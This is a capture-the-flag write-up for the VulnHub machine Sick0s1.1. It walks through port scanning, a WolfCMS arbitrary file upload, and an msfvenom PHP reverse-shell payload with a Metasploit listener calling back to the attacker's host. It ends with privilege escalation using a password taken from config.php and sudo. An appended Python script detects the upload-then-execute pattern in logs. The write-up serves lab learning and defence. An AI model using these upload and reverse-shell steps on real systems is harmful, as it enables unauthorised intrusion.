Target machine: Sick0s1.1 ~ VulnHub
Difficulty: 1.5 / 10.0. This article briefly records each step of penetrating the target machine; not every step is described in full detail, and some of the content may contain mistakes. I would appreciate readers pointing them out. Thank you!
Summary: the scan found ports 80 and 3128; port 3128 is set as a proxy to reach port 80. Information gathering showed the site runs the WolfCMS framework, and a Google search for the related vulnerability information turned up a file-upload and code-execution vulnerability. A reverse-connection script is generated with msfvenom and uploaded, the msf handler module listens locally, and after a low-privilege shell is obtained, /etc/passwd and config.php make it possible to log in as the sickos user and escalate privileges directly.
To be completed: connecting with the weevely tool, compiling files with g++
Host discovery & port scan
Target IP: 192.168.1.12
Port scan results:
主机探测&端口扫描
靶机ip为:192.168.1.12
端口扫描结果:
hhh@Kali2020:~$ sudo nmap -sS -p- 192.168.1.12
[sudo] hhh 的密码:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-06 11:07 CST
Nmap scan report for sickos (192.168.1.12)
Host is up (0.00029s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:EA:11:1C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 104.47 seconds
Information gathering
Accessing port 80 directly did not work here; a proxy has to be set up. In Firefox, set the proxy to 192.168.1.12:3128.
Scan the website:
hhh@Kali2020:~$ nikto -h 192.168.1.12 -useproxy http://192.168.1.12:3128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.12
+ Target Hostname: 192.168.1.12
+ Target Port: 80
+ Proxy: 192.168.1.12:3128
+ Start Time: 2021-02-06 13:34:43 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128
+ Uncommon header 'x-cache' found, with contents: MISS from localhost
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Sat Dec 5 08:35:02 2015
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place
+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Uncommon header '93e4r0-cve-2014-6271' found, with contents: true
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ 8726 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2021-02-06 13:40:21 (GMT8) (338 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
robots.txt hints that the site's framework is WolfCMS.
A Google search for related information turned up a file upload / code execution vulnerability:
Wolf CMS - Arbitrary File Upload / Execution
Obtain access by following the vulnerability demonstration:
A) Login as regular user ( who have access upload functionality )
B) Go to this page -
http://targetsite.com/wolfcms/?/admin/plugin/file_manager/browse/
C) Select upload a file option to upload Arbitrary File ( filename ex: "hello.php" )
D) Now you can access the file by here -
http://targetsite.com/wolfcms/public/hello.php
Related vulnerability information:
Obtaining access
I had learned the weevely tool earlier and used it briefly here, but it did not work; perhaps I have not mastered some of the details. I also tried connecting with China Chopper (菜刀) and AntSword (蚁剑), but those did not work either. I will look at it again after a while.
- Generate a reverse_tcp reverse-connection script, setting the IP and port of the local Kali machine
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.15 lport=4444 -f raw
- Write the output to the file shell.php
- Upload that file on the upload page
192.168.1.12/wolfcms/?/admin/plugin/file_manager/browse/
- Start a listener locally
msfconsole # start MSF
use exploit/multi/handler # select the handler module
set payload php/meterpreter/reverse_tcp # set the payload
show options # show the module's options
set lhost 192.168.1.15
set lport 4444
exploit
- Open the script on the website
http://192.168.1.12/wolfcms/public/shell.php
- msf receives the reverse connection; type shell to get a command shell
Privilege escalation
At first I wanted to use dirtycow for escalation, but the target has no g++, and a binary compiled on Kali does not match the actual execution environment, so it fails with the error
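As an added detection example (not from the original post): a Python script that runs the upload-then-execute chain above over constructed Apache access-log lines and flags any client that touched the WolfCMS file manager and later requested a .php file under /wolfcms/public/. The log lines and the upload endpoint path are constructed assumptions, not captured from the target.

```python
import re

# Constructed sample Apache combined-log lines (not from the original post).
# They mimic the chain described above: a visit to the admin file manager,
# an upload (endpoint path assumed), then a request for the placed PHP file.
SAMPLE_LOG = """\
192.168.1.15 - - [06/Feb/2021:14:01:02 +0800] "GET /wolfcms/?/admin/plugin/file_manager/browse/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.15 - - [06/Feb/2021:14:01:30 +0800] "POST /wolfcms/?/admin/plugin/file_manager/upload HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.15 - - [06/Feb/2021:14:02:05 +0800] "GET /wolfcms/public/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.1.20 - - [06/Feb/2021:14:03:00 +0800] "GET /wolfcms/public/images/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Any request to the WolfCMS file-manager plugin (browse or upload).
FILE_MANAGER_RE = re.compile(r'/admin/plugin/file_manager/')
# A PHP file being served from the public upload directory.
PUBLIC_PHP_RE = re.compile(r'^/wolfcms/public/[^?]*\.php(\?|$)', re.IGNORECASE)


def find_upload_then_exec(log_text):
    """Return (client_ip, php_path) pairs for clients that used the file
    manager and afterwards requested a .php file under /wolfcms/public/."""
    touched_file_manager = set()
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined-log format
        ip, path = m.group('ip'), m.group('path')
        if FILE_MANAGER_RE.search(path):
            touched_file_manager.add(ip)
        elif ip in touched_file_manager and PUBLIC_PHP_RE.match(path):
            alerts.append((ip, path))
    return alerts


if __name__ == '__main__':
    for ip, path in find_upload_then_exec(SAMPLE_LOG):
        print(f'ALERT: {ip} uploaded via file manager, then executed {path}')
```

The matching mitigation on the server side is to stop the web server from executing PHP at all inside the upload directory, so a placed .php file is served as inert text rather than run.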
cannot execute binary file
I will analyze this later.
Searching the directory turned up the file config.php, which contains the MySQL password.
Checking /etc/passwd shows that sickos is the first user.
Try logging in as that user with the password just found:
su sickos # switch user
sickos turns out to have fairly high privileges:
sudo -l # list the current user's sudo privileges
Obtain root privileges directly:
sudo -s # run the specified shell (the shell shown in passwd)
sudo su: switches to root, and the environment changes as well
sudo -s: switches to superuser privileges but keeps the original user's environment
Summary
- proxy on port 3128
- wolfcms
- reverse_tcp
- /etc/passwd